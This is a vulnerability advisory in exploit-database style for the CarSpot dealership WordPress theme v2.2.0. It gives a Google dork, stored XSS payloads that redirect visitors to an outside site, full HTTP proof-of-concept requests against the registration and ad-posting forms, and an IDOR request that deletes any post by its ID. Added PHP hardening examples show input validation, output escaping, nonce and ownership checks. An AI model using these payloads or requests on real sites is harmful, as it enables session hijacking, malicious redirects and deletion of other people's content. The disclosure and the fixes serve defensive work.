# Exploit Title: CarSpot – Dealership Wordpress Classified Theme v2.2.0 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/carspot/
# Date: 14/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://scriptsbundle.com/
# Software Link: https://themeforest.net/item/carspot-automotive-car-dealer-wordpress-classified-theme/20195539
# Version: 2.2.0
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 639
----[]- Info: -[]----
Demo website: https://carspot.scriptsbundle.com/
Demo Profile #0: https://carspot.scriptsbundle.com/dealer/m0ze-1054757240/
Demo Profile #1: https://carspot.scriptsbundle.com/dealer/greetzfromm0ze/
Demo Profile #2: https://carspot.scriptsbundle.com/dealer/jibom21023/
----[]- Persistent XSS -> Registration Form/User Profile: -[]----
A payload stored in this field executes for every visitor of the profile page, so it can be used to steal cookies and hijack a user or administrator session, or to force a redirect to a malicious website. Vulnerable input field: «Mobile Number».
Payload Sample: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/register/
Cookie: _your_cookies_here_
action=sb_register_user&sb_data=sb_reg_name%3Dm0ze%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%252F%252F%2522%253E%26sb_reg_contact%3D%2522%253E%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%253Bwindow.location%253D%2560https%253A%252F%252Fm0ze.ru%2560%253B%252F%252F%2522%253E%26sb_reg_email%3Dm0ze%2540was.here%26sb_reg_password%3Dasdasd%26sb_user_type%3Ddealer%26minimal-checkbox-1%3Don%26is_captcha%3Dno
----[]- Persistent XSS -> Ad Post: -[]----
A payload stored in any of these fields executes for every visitor of the ad page, so it can be used to steal cookies and hijack a user or administrator session, or to force a redirect to a malicious website. Vulnerable input fields: «Mobile Number», «Address», «Latitude» and «Longitude».
Payload Sample #0: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//">
Payload Sample #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/sell-your-car/
Cookie: _your_cookies_here_
action=sb_ad_posting&sb_data=ad_title=PoC&is_update=&is_level=&country_level=&ad_cat=62&ad_cat_id=227&ad_cat_sub=227&ad_cat_sub_sub=228&ad_price=1337&ad_price_type=Fixed&ad_avg_hwy=1337&ad_avg_city=1337&ad_mileage=1337&_carspot_ad_condition=166%7CNew&_carspot_ad_type=76%7CBuy&_carspot_ad_warranty=248%7CYes&_carspot_ad_years=36%7C2013&_carspot_ad_body_types=118%7CHatchback&_carspot_ad_transmissions=67%7CAutomatic&_carspot_ad_engine_capacities=44%7C3500&_carspot_ad_engine_types=126%7CHybrid&_carspot_ad_assembles=131%7CImported&_carspot_ad_colors=69%7CBlack&_carspot_ad_insurance=247%7CYes&ad_features%5B%5D=Cool+Box&ad_yvideo=&tags=&ad_description=PoC&sb_total_extra=0&ad_country=230&ad_country_id=293&ad_country_states=293&sb_user_name=m0ze&sb_contact_number=%22%3E%3C!--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D(alert)(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%22%3E&sb_user_address=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Address%60)%2F%2F%22%3E&ad_map_lat=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Latitude%60)%2F%2F%22%3E&ad_map_long=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Longitude%60)%2F%2F%22%3E&sb_make_it_feature=on&is_update=
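Both stored XSS findings above come down to the same two missing controls: the theme accepts arbitrary strings for fields that have a narrow legitimate format, and it writes those strings back into the page without context-appropriate escaping. The following PHP is an added example of how a fix looks in a WordPress theme; it is not CarSpot's code. The field names (sb_contact_number, sb_user_address, ad_map_lat, ad_map_long) are taken from the PoC request, the function names prefixed carspot_hardening_ are hypothetical, and the assumption that the form arrives as one URL-encoded sb_data string is inferred from the PoC. All validation and escaping helpers used are WordPress core functions.

```php
<?php
// Added hardening example (not CarSpot's own code): validate the advisory's
// fields on input and escape them on output.

/**
 * Validate the contact/location fields from the sb_data form string.
 * Returns an array of clean values, or a WP_Error for the first rejected field.
 */
function carspot_hardening_validate_fields( string $sb_data ) {
    // Assumption: the theme receives the form as one URL-encoded string
    // (as seen in the PoC request); wp_parse_str() is the core helper for that.
    wp_parse_str( $sb_data, $fields );

    $clean = array();

    // Mobile number: strip tags and control characters, then allow only
    // phone-like characters. The advisory payload fails this check outright.
    $phone = sanitize_text_field( $fields['sb_contact_number'] ?? '' );
    if ( ! preg_match( '/^\+?[0-9][0-9 ()\-]{4,24}$/', $phone ) ) {
        return new WP_Error( 'bad_phone', 'Mobile number may contain digits, spaces, +, -, ( ) only.' );
    }
    $clean['sb_contact_number'] = $phone;

    // Address is free text: sanitize here, and still escape on output below.
    $clean['sb_user_address'] = sanitize_text_field( $fields['sb_user_address'] ?? '' );

    // Latitude/longitude must be numbers within the valid geographic range.
    foreach ( array( 'ad_map_lat' => 90, 'ad_map_long' => 180 ) as $key => $limit ) {
        $raw = $fields[ $key ] ?? '';
        if ( ! is_numeric( $raw ) || abs( (float) $raw ) > $limit ) {
            return new WP_Error( 'bad_coord', "$key must be a number within +/-$limit." );
        }
        $clean[ $key ] = (float) $raw;
    }

    return $clean;
}

/**
 * Render stored values into the profile/ad template with escaping chosen for
 * each HTML context. Output escaping is what stops a stored payload from
 * executing even if it was written by a code path that skipped validation.
 */
function carspot_hardening_render_contact( array $ad ) : string {
    $html  = '<div class="dealer-contact">';
    // Text node context: esc_html() neutralises <, >, " and ' in the value.
    $html .= '<span class="phone">' . esc_html( $ad['sb_contact_number'] ) . '</span>';
    $html .= '<span class="address">' . esc_html( $ad['sb_user_address'] ) . '</span>';
    // Attribute context: esc_attr() for data-* attributes read by the map script,
    // so a value cannot close the attribute and start a new tag.
    $html .= sprintf(
        '<div class="map" data-lat="%s" data-long="%s"></div>',
        esc_attr( $ad['ad_map_lat'] ),
        esc_attr( $ad['ad_map_long'] )
    );
    return $html . '</div>';
}
```

Run the validator inside the sb_register_user and sb_ad_posting handlers before anything is saved, and use the renderer (or the same esc_html()/esc_attr() calls) wherever the theme echoes those fields, including admin-side listing screens, since an administrator viewing a dealer profile is the session the advisory's payload is aimed at.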
----[]- IDOR: -[]----
Any post/page/ad can be deleted by supplying its ID, regardless of who owns it:
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: carspot.scriptsbundle.com
User-Agent: Mozilla/5.0
...
Referer: https://carspot.scriptsbundle.com/search-cars/?carspot_layout_type=4
Cookie: _your_cookies_here_
action=sb_remove_ad&ad_id=XXXX
Where:
ad_id=XXXX is the unique WordPress ID of the page/post/ad; it is exposed as a class on the page's <body> tag.
Response:
HTTP/1.1 200 OK
...
1|Ad removed successfully.
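The IDOR exists because the sb_remove_ad handler trusts the supplied ad_id without checking that the caller owns that post or that the request was issued from the theme's own page. The following PHP is an added example of a handler with those checks; it is not CarSpot's code. The wp_ajax_sb_remove_ad hook name follows the action seen in the PoC, while the nonce action name, the 'ad' post type and the carspot_hardening_ function name are assumptions. The capability, nonce and JSON helpers are WordPress core.

```php
<?php
// Added hardening example (not CarSpot's own code): an AJAX delete handler
// that binds the request to the logged-in user's own listing.

add_action( 'wp_ajax_sb_remove_ad', 'carspot_hardening_remove_ad' );
// Note: no wp_ajax_nopriv_sb_remove_ad registration, so anonymous callers
// never reach this handler at all.

function carspot_hardening_remove_ad() {
    // CSRF: the request must carry a nonce issued to this user for this action
    // (the page that renders the delete button emits wp_create_nonce( 'sb_remove_ad' )).
    check_ajax_referer( 'sb_remove_ad', 'nonce' );

    $ad_id = isset( $_POST['ad_id'] ) ? absint( $_POST['ad_id'] ) : 0;
    $post  = $ad_id ? get_post( $ad_id ) : null;

    // Object-level authorization: the post must exist, be a listing (post type
    // 'ad' is a placeholder for the theme's real type), and the current user must
    // hold delete_post for *this* post. delete_post is a meta capability that
    // WordPress resolves against post_author, so a dealer can only delete their own
    // listings while administrators keep delete_others_posts.
    if ( ! $post || 'ad' !== $post->post_type || ! current_user_can( 'delete_post', $ad_id ) ) {
        // One response for "missing" and "not yours" avoids confirming which IDs exist.
        wp_send_json_error( array( 'message' => 'Ad not found.' ), 403 );
    }

    // Trash instead of hard-deleting so a mistaken or abusive removal can be reverted.
    if ( ! wp_trash_post( $ad_id ) ) {
        wp_send_json_error( array( 'message' => 'Could not remove ad.' ), 500 );
    }

    wp_send_json_success( array( 'message' => 'Ad removed successfully.' ) );
}
```

The same pattern (nonce check, load the object, check a per-object capability, act) applies to every other AJAX action the theme exposes that takes an ID. For sites that cannot patch immediately, a 403 returned by this style of check, or any sb_remove_ad request whose ad_id does not belong to the requesting user, is the event worth alerting on.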